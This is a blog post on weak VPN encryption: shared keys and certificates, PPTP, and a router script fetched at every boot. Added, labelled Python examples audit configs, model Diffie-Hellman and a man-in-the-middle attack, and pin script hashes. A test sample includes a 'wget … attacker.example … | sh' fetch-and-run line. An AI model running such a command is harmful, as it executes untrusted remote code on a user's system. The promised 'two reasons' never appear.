Wow.
A while back, when I was writing a book on online privacy, I looked into the services a couple of VPN providers actually, you know, provide. I got very interesting results. Not actually related to Scarecrow, per se, but I’m assuming a lot of our customers are occasionally online and may think a VPN will help. (It actually might, though….)
TLDR: Many VPN providers do not actually offer what I would call strong encryption. At all. Though this doesn’t mean they won’t throw buzzwords at you.
I checked out TorGuard.net to start with (turns out that “Tor” in the name is short for “torrent”, btw). They offer a choice of protocols: OpenVPN, PPTP, and L2TP. The PPTP link goes to a Wikipedia article about its “security”, which is minimal at best. Though, spoiler: as actually implemented by VPN providers, the PPTP option may be your best protection against casual traffic decryption. Weird but true. Breaking it at least requires some computing resources (recovering the MPPE session key from a recorded MS-CHAPv2 handshake comes down to cracking a single DES key), whereas with a known key the others require none.
The L2TP method requires what’s called a pre-shared key, which can mean very strong encryption; unfortunately, the key used with TorGuard is “torguard” and is the same for all users. OpenVPN can use client certificates or a pre-shared key, or even both, but TorGuard’s implementation uses the same certificate for everybody, and it’s freely downloadable by anyone at all from their website. They’ll throw buzzwords at you about the encryption they do, but if the key is known, none of that necessarily matters.
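What “one static key for everybody” versus a properly set-up TLS-mode client looks like in an OpenVPN config, and the directives worth checking for, as an added example. This is not code from the original post and the three .ovpn fragments are constructed, not TorGuard’s files; the host name and key/cert file names in them are assumptions.

```python
"""Lint an OpenVPN client config for the two things this post cares about:
(1) is a single static key the traffic key, and (2) in TLS mode, is anything
stopping a holder of the shared client cert from posing as the server.

Added example; the .ovpn fragments are constructed, not any provider's files.
"""
import shlex

STATIC_KEY_CONFIG = """\
# constructed: static-key mode, the shape a "pre-shared key" client file takes
dev tun
proto udp
remote vpn.example.net 1194
secret static.key
cipher AES-256-CBC
"""

SHARED_CERT_CONFIG = """\
# constructed: TLS mode, but nothing stops a client cert posing as the server
client
dev tun
proto udp
remote vpn.example.net 1194
ca ca.crt
cert client.crt
key client.key
"""

HARDENED_CONFIG = """\
# constructed: TLS mode with server-identity and control-channel checks on
client
dev tun
proto udp
remote vpn.example.net 1194
remote-cert-tls server
tls-version-min 1.2
tls-auth ta.key 1
cipher AES-256-GCM
auth SHA256
ca ca.crt
cert client.crt
key client.key
"""


def parse_ovpn(text):
    """Map each directive to its arguments (last occurrence wins; good enough
    for this check). Whole-line '#' and ';' comments are skipped."""
    directives = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        parts = shlex.split(line)
        directives[parts[0]] = parts[1:]
    return directives


def audit(text):
    """Return the findings that matter to a recorder who also has the key."""
    d = parse_ovpn(text)
    findings = []
    if "secret" in d:
        # Static-key mode: no TLS handshake, so no ephemeral keys. Whoever
        # holds static.key decrypts a recording of any session, from any point.
        findings.append("static-key mode ('secret'): shared key is the traffic key, no forward secrecy")
        return findings
    if not ("client" in d or "tls-client" in d):
        findings.append("no 'client'/'tls-client': not TLS mode")
        return findings
    if "remote-cert-tls" not in d:
        # Without this, any holder of a valid client cert (everyone, when the
        # provider hands out one cert) can present it as the server and MITM you.
        findings.append("no 'remote-cert-tls server': a shared client cert can impersonate the server")
    if "tls-auth" not in d and "tls-crypt" not in d:
        findings.append("no 'tls-auth'/'tls-crypt': control channel has no extra HMAC or encryption")
    if "tls-version-min" not in d:
        findings.append("no 'tls-version-min': old TLS versions accepted")
    return findings
```

Run `audit()` over the client file a provider hands you: a `secret` line is the end of the discussion, and in TLS mode the absence of `remote-cert-tls server` is what turns a publicly downloadable client certificate into a server-impersonation kit.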
What does this mean? It’s really just this simple: if anyone at all (ISP, wifi hotspot operator, NSA, MPAA, whoever) records your VPN session from the beginning, you should assume they can decrypt the whole thing at their leisure. This doesn’t necessarily mean they can get everything. But how do you know?
Note: if someone comes in late and starts recording after your session has begun, they’re probably out of luck decrypting your traffic, for the moment. Some people store this stuff forever, just in case a way to break a cipher comes along later on. Regardless, the next time you connect, if they’re still logging… well. A confession: OpenVPN, if properly configured, can (probably) defeat this. Is it properly configured? Not by default, and not without effort. Can PPTP sessions be secured at all? No. How about anything relying on a pre-shared key? Not if the key is known. Oh well.
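The two situations above (a recorder who holds the shared key versus one who does not, and what “properly configured” buys you) as a worked model. This is an added example, not code from the original post or from any VPN product: the cipher (HMAC-SHA256 in counter mode) and the 127-bit Diffie-Hellman group are toys assumed for illustration, and the messages are constructed.

```python
"""Model of why a known pre-shared key is fatal without an ephemeral exchange.

Added example; toy cipher and toy DH group are assumptions for illustration.
  1. psk_only: the pre-shared key IS the traffic key. A recorder who knows
     the key decrypts the whole capture, from any point.
  2. psk_auth_dh: the key only authenticates an ephemeral DH exchange. The
     passive recorder gets nothing; an ACTIVE attacker with the key still can.
"""
import hashlib
import hmac
import secrets

P = 2 ** 127 - 1   # toy prime modulus (assumption; far too small for real use)
G = 3

def keystream(key, nonce, n):
    """Toy keystream: HMAC-SHA256(key, nonce || counter), illustration only."""
    out, ctr = b"", 0
    while len(out) < n:
        out += hmac.new(key, nonce + ctr.to_bytes(4, "big"), hashlib.sha256).digest()
        ctr += 1
    return out[:n]

def seal(key, session_nonce, index, data):
    """XOR with a keystream unique to (key, session nonce, message index)."""
    nonce = session_nonce + index.to_bytes(4, "big")
    return bytes(x ^ k for x, k in zip(data, keystream(key, nonce, len(data))))

unseal = seal  # XOR stream cipher: decryption is the same operation

# Design 1: the pre-shared key is the traffic key ------------------------------

def psk_only_session(psk, client_msgs):
    """Client encrypts straight under psk. Returns the wire transcript."""
    session_nonce = secrets.token_bytes(16)  # sent in the clear
    return [session_nonce] + [seal(psk, session_nonce, i, m)
                              for i, m in enumerate(client_msgs)]

def passive_decrypt_psk_only(psk, wire):
    """A recorder holding psk recovers every message from the capture."""
    return [unseal(psk, wire[0], i, c) for i, c in enumerate(wire[1:])]

# Design 2: psk only authenticates an ephemeral Diffie-Hellman exchange --------

def mac(psk, body):
    return hmac.new(psk, body, hashlib.sha256).digest()

def pack_dh(psk, pub):
    """DH public value (16 bytes; pub < P < 2**128) plus a MAC under psk."""
    body = pub.to_bytes(16, "big")
    return body + mac(psk, body)

def unpack_dh(psk, blob):
    body, tag = blob[:16], blob[16:]
    if not hmac.compare_digest(tag, mac(psk, body)):
        raise ValueError("bad MAC on DH value: wrong PSK or tampering")
    return int.from_bytes(body, "big")

def session_key(shared_secret):
    return hashlib.sha256(shared_secret.to_bytes(16, "big")).digest()

def psk_auth_dh_session(psk, client_msgs, mitm_priv=None):
    """Returns (wire transcript, what the server decrypted, what a MITM read).

    With mitm_priv set, an active attacker who knows psk swaps both DH values
    for its own and re-MACs them, ending up with a shared key on each side.
    """
    a, b = secrets.randbelow(P - 2) + 1, secrets.randbelow(P - 2) + 1
    A, B = pow(G, a, P), pow(G, b, P)
    session_nonce = secrets.token_bytes(16)
    M = pow(G, mitm_priv, P) if mitm_priv is not None else None

    hs_to_server = pack_dh(psk, A if M is None else M)  # client -> server
    hs_to_client = pack_dh(psk, B if M is None else M)  # server -> client
    wire = [session_nonce, hs_to_server, hs_to_client]
    k_server = session_key(pow(unpack_dh(psk, hs_to_server), b, P))
    k_client = session_key(pow(unpack_dh(psk, hs_to_client), a, P))

    server_plain, mitm_plain = [], []
    for i, m in enumerate(client_msgs):
        c = seal(k_client, session_nonce, i, m)
        if M is not None:
            # Client key = H(M^a) = H(A^m); server key = H(M^b) = H(B^m).
            plain = unseal(session_key(pow(A, mitm_priv, P)), session_nonce, i, c)
            mitm_plain.append(plain)
            c = seal(session_key(pow(B, mitm_priv, P)), session_nonce, i, plain)
        wire.append(c)
        server_plain.append(unseal(k_server, session_nonce, i, c))
    return wire, server_plain, mitm_plain

def passive_decrypt_dh(psk, wire):
    """Same recorder, holding psk and the capture: it can check the handshake
    was genuine, but the traffic key is H(g^ab) and it only sees g^a and g^b.
    With no private exponent there is nothing to decrypt with."""
    unpack_dh(psk, wire[1])
    unpack_dh(psk, wire[2])
    return None
```

The second design is the shape of a TLS-mode OpenVPN (or IKE) handshake: a public key or shared secret authenticates the exchange, an ephemeral Diffie-Hellman agreement produces the traffic key, and a full recording plus the long-term key still gives a passive observer nothing. Note what it does not fix: the `mitm_priv` path shows that a key everybody has still lets an active attacker on the path (the hotspot operator, say) forge both halves of the handshake and read everything, which is why a shared client certificate is never harmless.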
I took a quick look around. Overplay.net seemed to offer a cool service, but it has precisely the same limitations. In addition, if you want to configure a connection on a router running the freely available dd-wrt firmware, they’ll give you an easy application you can download to set it up for you! The catch: each time your router reboots, it goes to overplay.net and downloads the code. Which means, in addition to the fact that your ISP (or other “attacker”) can possibly decrypt your VPN traffic if they want to, they can also run arbitrary code on your router. Or an attacker who pretends to be overplay.net can do so. Which means, in principle, that they can access your private (home?) network too.
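The check a router owner would want in front of that boot-time download, as an added example. This is not dd-wrt’s or overplay.net’s code: `fetch` stands in for the router’s download step, both scripts are constructed, the `/jffs` path is an assumption, and the pinned digest is something the owner sets once after reading the script they actually intend to run.

```python
"""Pin the digest of boot-time code before running it.

Added example, not dd-wrt's or overplay.net's code. Anything that changes the
downloaded script, whether a vendor update or an attacker answering for
overplay.net, fails verification until the owner reads it and re-pins.
"""
import hashlib
import hmac

# Constructed samples: the script the owner reviewed, and a swapped-in one.
REVIEWED_SCRIPT = b"#!/bin/sh\nopenvpn --config /jffs/vpn.conf --daemon\n"   # path assumed
TAMPERED_SCRIPT = b"#!/bin/sh\nwget -O - http://attacker.example/x | sh\n"
PINNED_SHA256 = hashlib.sha256(REVIEWED_SCRIPT).hexdigest()

def verify_pinned(blob, pinned_hex):
    """True only if the downloaded bytes hash to the digest pinned on the router."""
    return hmac.compare_digest(hashlib.sha256(blob).hexdigest(), pinned_hex)

def boot_step(fetch, pinned_hex):
    """Download the setup script and hand it back for execution only if it
    verifies; on a network failure or any mismatch return None so the router
    runs nothing rather than something unreviewed."""
    try:
        blob = fetch()
    except OSError:   # link down, DNS pointed somewhere that never answers, etc.
        return None
    return blob if verify_pinned(blob, pinned_hex) else None
```

A pinned hash is deliberately inflexible; a signature over the script relaxes that at the price of trusting whoever holds the signing key, which for a boot-time fetch from the provider is exactly the trust the post is questioning. The simplest fix of all is to keep the config on the router and fetch nothing at boot.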
Does this mean no VPN is worth the bother? Not quite, and for two reasons:
You know what? Personally I won’t trust any VPN service until it allows an audit, or some other form of verifiable transparency. I want to see all config files, and have some assurance that they’re real. Otherwise? This stuff is all based on trust. Do you know these people personally, and fully trust their competence? Me neither.
So, well, there you are. If you want to browse the internet at all, I strongly recommend using one browser (possibly configured to use Tor) for all the sites to which you log in, and another (ideally the Tor Browser Bundle) for everything else. I see nothing wrong with adding a VPN to the mix–but I’d use both the VPN and Tor.
Did you want streaming video or audio? Well, I guess a VPN may be better than nothing. But possibly…not much better. Bear it in mind, okay? Also bear in mind that I’m currently trying really hard not to post a bunch of stuff about “secure” browsing with an iPhone vs. doing the same via Android.
And have fun out there! {8′>